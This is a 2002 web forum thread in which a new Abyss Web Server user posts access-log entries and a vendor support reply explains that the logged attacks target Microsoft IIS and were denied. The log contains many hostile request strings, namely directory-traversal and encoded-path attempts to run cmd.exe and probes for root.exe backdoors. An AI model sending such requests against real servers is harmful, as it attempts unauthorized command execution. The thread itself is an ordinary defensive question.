| View previous topic :: View next topic |
| Author |
Message |
skiward
Guest
|
 Posted: Wed Oct 02, 2002 2:59 pm Post subject: Security |
 |
|
I just set the server up last night. I have yet to share the addy with anyone. I was checking the log this morning out of curiosity, and noticed what appears to be one, or several attempts to take over my system. (multiple IP's) I have included a copy of the appropriate log code below. I know that all the GET attempts returned 400 or 404 calls, so they should have all been denied, but is the server secure to attempted attacks like this? Thanks
24.157.19.214 - - [02/Oct/2002:00:24:36 +1133] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 438
24.76.144.218 - - [02/Oct/2002:01:42:48 +1133] "GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 400 440
24.192.4.123 - - [02/Oct/2002:02:00:30 +1133] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 438
24.192.4.123 - - [02/Oct/2002:02:00:32 +1133] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 438
24.192.4.123 - - [02/Oct/2002:02:00:33 +1133] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 438
24.192.4.123 - - [02/Oct/2002:02:00:33 +1133] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 438
24.192.4.123 - - [02/Oct/2002:02:00:35 +1133] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 440
24.192.4.123 - - [02/Oct/2002:02:00:36 +1133] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 440
24.192.4.123 - - [02/Oct/2002:02:00:37 +1133] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 440
24.192.4.123 - - [02/Oct/2002:02:00:38 +1133] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 440
24.192.4.123 - - [02/Oct/2002:02:00:39 +1133] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 440
24.192.4.123 - - [02/Oct/2002:02:00:41 +1133] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 440
24.192.4.123 - - [02/Oct/2002:02:00:41 +1133] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 440
24.192.4.123 - - [02/Oct/2002:02:00:42 +1133] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 440
24.192.4.123 - - [02/Oct/2002:02:00:48 +1133] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 440
24.192.4.123 - - [02/Oct/2002:02:00:49 +1133] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 440
24.86.214.239 - - [02/Oct/2002:09:14:51 +1133] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 438
24.86.214.239 - - [02/Oct/2002:09:14:52 +1133] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 438
24.86.214.239 - - [02/Oct/2002:09:14:53 +1133] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 438
24.86.214.239 - - [02/Oct/2002:09:14:53 +1133] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 438
24.86.214.239 - - [02/Oct/2002:09:14:54 +1133] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 440
24.86.214.239 - - [02/Oct/2002:09:14:55 +1133] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 440
24.86.214.239 - - [02/Oct/2002:09:14:55 +1133] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 440
24.86.214.239 - - [02/Oct/2002:09:14:55 +1133] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 440
24.86.214.239 - - [02/Oct/2002:09:14:56 +1133] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 440
24.86.214.239 - - [02/Oct/2002:09:14:57 +1133] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 440
24.86.214.239 - - [02/Oct/2002:09:14:57 +1133] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 440
24.86.214.239 - - [02/Oct/2002:09:14:57 +1133] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 440
24.86.214.239 - - [02/Oct/2002:09:14:59 +1133] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 440
24.86.214.239 - - [02/Oct/2002:09:15:00 +1133] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 440
24.120.220.66 - - [02/Oct/2002:09:37:34 +1133] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 438
24.120.220.66 - - [02/Oct/2002:09:37:35 +1133] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 438
24.120.220.66 - - [02/Oct/2002:09:37:35 +1133] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 438
24.120.220.66 - - [02/Oct/2002:09:37:36 +1133] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 438
24.120.220.66 - - [02/Oct/2002:09:37:36 +1133] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 440
24.120.220.66 - - [02/Oct/2002:09:37:36 +1133] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 440
24.120.220.66 - - [02/Oct/2002:09:37:37 +1133] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 440
24.120.220.66 - - [02/Oct/2002:09:37:38 +1133] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 440
24.120.220.66 - - [02/Oct/2002:09:37:39 +1133] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 440
24.120.220.66 - - [02/Oct/2002:09:37:39 +1133] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 440
24.120.220.66 - - [02/Oct/2002:09:37:40 +1133] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 440
24.120.220.66 - - [02/Oct/2002:09:37:40 +1133] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 440
24.120.220.66 - - [02/Oct/2002:09:37:42 +1133] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 440
24.120.220.66 - - [02/Oct/2002:09:37:43 +1133] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 440 |
|
| Back to top |
|
 |
aprelium
-
Joined: 22 Mar 2002
Posts: 6800
|
| Posted: Wed Oct 02, 2002 3:14 pm Post subject: Re: Security |
|
|
| skiward wrote: | I just set the server up last night. I have yet to share the addy with anyone. I was checking the log this morning out of curiosity, and noticed what appears to be one, or several attempts to take over my system. (multiple IP's) I have included a copy of the appropriate log code below. I know that all the GET attempts returned 400 or 404 calls, so they should have all been denied, but is the server secure to attempted attacks like this? Thanks
|
These attacks affect Microsoft IIS web servers.
Even small and even Aprelium is not as huge as Microsoft, Abyss Web Server was designed to be robust and secure. The best proof is that it denied all the malicious requests you received :D
(and 6 months after the first release and with over 30000 users worldwide, no crash was reported and only two minor URL decoding bugs were detected and they were fixed in the next hours after their discovery.)
_________________
Support Team
Aprelium - http://www.aprelium.com |
|
| Back to top |
   |
|
|
|
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
|
|
